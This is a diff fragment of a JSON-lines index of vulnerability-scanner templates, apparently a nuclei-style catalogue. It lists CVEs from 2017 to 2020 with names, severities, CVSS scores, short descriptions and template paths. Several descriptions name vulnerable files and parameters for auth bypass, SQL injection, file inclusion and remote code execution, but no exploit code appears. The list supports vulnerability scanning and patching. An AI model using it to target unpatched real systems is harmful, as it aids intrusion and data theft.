{"ID":"CVE-2017-7615","Info":{"Name":"MantisBT \u003c=2.30 - Arbitrary Password Reset/Admin Access","Severity":"high","Description":"MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2017/CVE-2017-7615.yaml"}
{"ID":"CVE-2017-7855","Info":{"Name":"IceWarp WebMail 11.3.1.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp WebMail 11.3.1.5 is vulnerable to cross-site scripting via the language parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-7855.yaml"}
{"ID":"CVE-2017-7921","Info":{"Name":"Hikvision - Authentication Bypass","Severity":"critical","Description":"Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2017/CVE-2017-7921.yaml"}
{"ID":"CVE-2017-7925","Info":{"Name":"Dahua Security - Configuration File Disclosure","Severity":"critical","Description":"A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-7925.yaml"}
{"ID":"CVE-2017-8229","Info":{"Name":"Amcrest IP Camera Web Management - Data Exposure","Severity":"critical","Description":"Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-8229.yaml"}
@ -451,7 +483,7 @@
{"ID":"CVE-2018-1000671","Info":{"Name":"Sympa version =\u003e6.2.16 - Cross-Site Scripting","Severity":"medium","Description":"Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-1000671.yaml"}
{"ID":"CVE-2018-1000856","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2018/CVE-2018-1000856.yaml"}
{"ID":"CVE-2018-1000861","Info":{"Name":"Jenkins - Remote Command Injection","Severity":"critical","Description":"Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-1000861.yaml"}
{"ID":"CVE-2018-10093","Info":{"Name":"AudioCode 420HD - Remote Code Execution","Severity":"high","Description":"AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2018/CVE-2018-10093.yaml"}
{"ID":"CVE-2018-10093","Info":{"Name":"AudioCodes 420HD - Remote Code Execution","Severity":"high","Description":"AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2018/CVE-2018-10093.yaml"}
{"ID":"CVE-2018-10095","Info":{"Name":"Dolibarr \u003c7.0.2 - Cross-Site Scripting","Severity":"medium","Description":"Dolibarr before 7.0.2 is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-10095.yaml"}
{"ID":"CVE-2018-10141","Info":{"Name":"Palo Alto Networks PAN-OS GlobalProtect \u003c8.1.4 - Cross-Site Scripting","Severity":"medium","Description":"Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-10141.yaml"}
{"ID":"CVE-2018-10201","Info":{"Name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","Severity":"high","Description":"Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10201.yaml"}
@ -577,6 +609,7 @@
{"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"}
{"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"}
{"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"}
{"ID":"CVE-2018-7282","Info":{"Name":"TITool PrintMonitor - Blind SQL Injection","Severity":"critical","Description":"The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7282.yaml"}
{"ID":"CVE-2018-7422","Info":{"Name":"WordPress Site Editor \u003c=1.1.1 - Local File Inclusion","Severity":"high","Description":"WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7422.yaml"}
{"ID":"CVE-2018-7467","Info":{"Name":"AxxonSoft Axxon Next - Local File Inclusion","Severity":"high","Description":"AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7467.yaml"}
{"ID":"CVE-2018-7490","Info":{"Name":"uWSGI PHP Plugin Local File Inclusion","Severity":"high","Description":"uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7490.yaml"}
@ -592,6 +625,7 @@
{"ID":"CVE-2018-8719","Info":{"Name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","Severity":"medium","Description":"WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8719.yaml"}
{"ID":"CVE-2018-8727","Info":{"Name":"Mirasys DVMS Workstation \u003c=5.12.6 - Local File Inclusion","Severity":"high","Description":"Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-8727.yaml"}
{"ID":"CVE-2018-8770","Info":{"Name":"Cobub Razor 0.8.0 - Information Disclosure","Severity":"medium","Description":"Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8770.yaml"}
{"ID":"CVE-2018-8823","Info":{"Name":"PrestaShop Responsive Mega Menu Module - Remote Code Execution","Severity":"critical","Description":"The 'Responsive Mega Menu' module for PrestaShop is prone to a remote code execution and SQL injection vulnerability. modules/bamegamenu/ajax_phpcode.php in the Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro module 1.0.32 for PrestaShop allows remote attackers to execute an SQL injection or remote code execution through function calls in the code parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-8823.yaml"}
{"ID":"CVE-2018-9118","Info":{"Name":"WordPress 99 Robots WP Background Takeover Advertisements \u003c=4.1.4 - Local File Inclusion","Severity":"high","Description":"WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9118.yaml"}
{"ID":"CVE-2018-9161","Info":{"Name":"PrismaWEB - Credentials Disclosure","Severity":"critical","Description":"PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-9161.yaml"}
{"ID":"CVE-2018-9205","Info":{"Name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","Severity":"high","Description":"In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9205.yaml"}
@ -653,6 +687,7 @@
{"ID":"CVE-2019-15642","Info":{"Name":"Webmin \u003c 1.920 - Authenticated Remote Code Execution","Severity":"high","Description":"rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states \"RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users.\"\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-15642.yaml"}
{"ID":"CVE-2019-15713","Info":{"Name":"WordPress My Calendar \u003c= 3.1.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin My Calendar \u003c= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15713.yaml"}
{"ID":"CVE-2019-15811","Info":{"Name":"DomainMOD \u003c=4.13.0 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15811.yaml"}
{"ID":"CVE-2019-15829","Info":{"Name":"Gallery Photoblocks \u003c 1.1.43 - Cross-Site Scripting","Severity":"medium","Description":"The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2019/CVE-2019-15829.yaml"}
{"ID":"CVE-2019-15858","Info":{"Name":"WordPress Woody Ad Snippets \u003c2.2.5 - Cross-Site Scripting/Remote Code Execution","Severity":"high","Description":"WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-15858.yaml"}
{"ID":"CVE-2019-15859","Info":{"Name":"Socomec DIRIS A-40 Devices Password Disclosure","Severity":"critical","Description":"Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-15859.yaml"}
{"ID":"CVE-2019-15889","Info":{"Name":"WordPress Download Manager \u003c2.9.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15889.yaml"}
@ -759,7 +794,7 @@
{"ID":"CVE-2020-0618","Info":{"Name":"Microsoft SQL Server Reporting Services - Remote Code Execution","Severity":"high","Description":"Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-0618.yaml"}
{"ID":"CVE-2020-10148","Info":{"Name":"SolarWinds Orion API - Auth Bypass","Severity":"critical","Description":"SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10148.yaml"}
{"ID":"CVE-2020-10220","Info":{"Name":"rConfig 3.9 - SQL injection","Severity":"critical","Description":"An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10220.yaml"}
{"ID":"CVE-2020-10220","Info":{"Name":"rConfig 3.9 - SQL Injection","Severity":"critical","Description":"An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10220.yaml"}
{"ID":"CVE-2020-10546","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10546.yaml"}
{"ID":"CVE-2020-10547","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10547.yaml"}
{"ID":"CVE-2020-10548","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10548.yaml"}
@ -785,6 +820,8 @@
{"ID":"CVE-2020-12054","Info":{"Name":"WordPress Catch Breadcrumb \u003c1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-12054.yaml"}
{"ID":"CVE-2020-12116","Info":{"Name":"Zoho ManageEngine OpManger - Arbitrary File Read","Severity":"high","Description":"Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-12116.yaml"}
{"ID":"CVE-2020-12127","Info":{"Name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","Severity":"high","Description":"WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-12127.yaml"}
{"ID":"CVE-2020-12256","Info":{"Name":"rConfig 3.9.4 - Cross-Site Scripting","Severity":"medium","Description":"The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-12256.yaml"}
{"ID":"CVE-2020-12259","Info":{"Name":"rConfig 3.9.4 - Cross-Site Scripting","Severity":"medium","Description":"rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-12259.yaml"}
{"ID":"CVE-2020-12447","Info":{"Name":"Onkyo TX-NR585 Web Interface - Directory Traversal","Severity":"high","Description":"Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-12447.yaml"}
{"ID":"CVE-2020-12478","Info":{"Name":"TeamPass 2.1.27.36 - Improper Authentication","Severity":"high","Description":"TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-12478.yaml"}
{"ID":"CVE-2020-12720","Info":{"Name":"vBulletin SQL Injection","Severity":"critical","Description":"vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-12720.yaml"}
@ -797,8 +834,10 @@
{"ID":"CVE-2020-13379","Info":{"Name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","Severity":"high","Description":"Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2020/CVE-2020-13379.yaml"}
{"ID":"CVE-2020-13405","Info":{"Name":"Microweber \u003c1.1.20 - Information Disclosure","Severity":"high","Description":"Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-13405.yaml"}
{"ID":"CVE-2020-13483","Info":{"Name":"Bitrix24 \u003c=20.0.0 - Cross-Site Scripting","Severity":"medium","Description":"The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-13483.yaml"}
{"ID":"CVE-2020-13638","Info":{"Name":"rConfig 3.9 - Authentication Bypass(Admin Login)","Severity":"critical","Description":"lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-13638.yaml"}
{"ID":"CVE-2020-13700","Info":{"Name":"WordPresss acf-to-rest-api \u003c=3.1.0 - Insecure Direct Object Reference","Severity":"high","Description":"WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-13700.yaml"}
{"ID":"CVE-2020-13820","Info":{"Name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","Severity":"medium","Description":"Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-13820.yaml"}
{"ID":"CVE-2020-13851","Info":{"Name":"Artica Pandora FMS 7.44 - Remote Code Execution","Severity":"high","Description":"Artica Pandora FMS 7.44 allows remote command execution via the events feature.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-13851.yaml"}
{"ID":"CVE-2020-13927","Info":{"Name":"Airflow Experimental \u003c1.10.11 - REST API Auth Bypass","Severity":"critical","Description":"Airflow's Experimental API prior 1.10.11 allows all API requests without authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-13927.yaml"}
{"ID":"CVE-2020-13937","Info":{"Name":"Apache Kylin - Exposed Configuration File","Severity":"medium","Description":"Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-13937.yaml"}
{"ID":"CVE-2020-13942","Info":{"Name":"Apache Unomi \u003c1.5.2 - Remote Code Execution","Severity":"critical","Description":"Apache Unomi allows conditions to use OGNL and MVEL scripting which\noffers the possibility to call static Java classes from the JDK\nthat could execute code with the permission level of the running Java process.\nThis vulnerability affects all versions of Apache Unomi prior to 1.5.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-13942.yaml"}
@ -875,6 +914,7 @@
{"ID":"CVE-2020-24571","Info":{"Name":"NexusDB \u003c4.50.23 - Local File Inclusion","Severity":"high","Description":"NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-24571.yaml"}
{"ID":"CVE-2020-24579","Info":{"Name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","Severity":"high","Description":"D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-24579.yaml"}
{"ID":"CVE-2020-24589","Info":{"Name":"WSO2 API Manager \u003c=3.1.0 - Blind XML External Entity Injection","Severity":"critical","Description":"WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2020/CVE-2020-24589.yaml"}
{"ID":"CVE-2020-24701","Info":{"Name":"OX Appsuite - Cross-Site Scripting","Severity":"medium","Description":"OX App Suite through 7.10.4 allows XSS via the app loading mechanism (the PATH_INFO to the /appsuite URI).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-24701.yaml"}
{"ID":"CVE-2020-24902","Info":{"Name":"Quixplorer \u003c=2.4.1 - Cross-Site Scripting","Severity":"medium","Description":"Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-24902.yaml"}
{"ID":"CVE-2020-24903","Info":{"Name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","Severity":"medium","Description":"Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-24903.yaml"}
{"ID":"CVE-2020-24912","Info":{"Name":"QCube Cross-Site-Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-24912.yaml"}
@ -964,6 +1004,7 @@
{"ID":"CVE-2020-6287","Info":{"Name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","Severity":"critical","Description":"SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2020/CVE-2020-6287.yaml"}
{"ID":"CVE-2020-6308","Info":{"Name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","Severity":"medium","Description":"SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-6308.yaml"}
{"ID":"CVE-2020-6637","Info":{"Name":"OpenSIS 7.3 - SQL Injection","Severity":"critical","Description":"OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-6637.yaml"}
{"ID":"CVE-2020-6950","Info":{"Name":"Eclipse Mojarra - Local File Read","Severity":"medium","Description":"Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2020/CVE-2020-6950.yaml"}
{"ID":"CVE-2020-7107","Info":{"Name":"WordPress Ultimate FAQ \u003c1.8.30 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-7107.yaml"}
